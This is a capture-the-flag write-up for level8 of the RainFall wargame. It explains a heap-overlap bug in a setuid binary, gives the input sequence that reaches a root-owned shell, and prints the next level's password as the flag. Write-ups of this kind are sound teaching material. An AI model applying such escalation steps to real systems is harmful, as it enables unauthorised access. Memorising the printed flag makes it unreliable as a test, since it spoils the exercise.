After login we see next information:
```
  GCC stack protector support:            Enabled
  Strict user copy checks:                Disabled
  Restrict /dev/mem access:               Enabled
  Restrict /dev/kmem access:              Enabled
  grsecurity / PaX: No GRKERNSEC
  Kernel Heap Hardening: No KERNHEAP
 System-wide ASLR (kernel.randomize_va_space): Off (Setting: 0)
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   /home/user/level8/level8
```

Command: `ls -l`
```
total 8
-rwsr-s---+ 1 level9 users 6057 Mar  6  2016 level8
```

Using `objdump` and `radar` tools I find out that there is only one function inside `main`.

The problem which is shown here - incorrect use of heap memory. Allocate 8 bytes memory with `malloc` but using `stdcpy` copying less than 30 bytes. So as a result that data will be overridden by next allocation `strdup`. Another one problem that free used only for `auth` string - `service` string, in case, if we will insert it a few time, will be lost and there will be a memory leak.

To satisfy all conditions and fall inside `system("/bin/sh")` firstly I need to pass `auth`, after that, I pass `service` with at least 15 bytes. In the end - type `login` and we inside `shell`.

```
level8@RainFall:~$ ./level8
(nil), (nil)
auth
0x804a008, (nil)
service 123456789012345
0x804a008, 0x804a018
login
$ cat /home/user/level9/.pass
c542e581c5ba5162a85f767996e3247ed619ef6c6f7b76a59435545dc6259f8a
```
Flag: `c542e581c5ba5162a85f767996e3247ed619ef6c6f7b76a59435545dc6259f8a`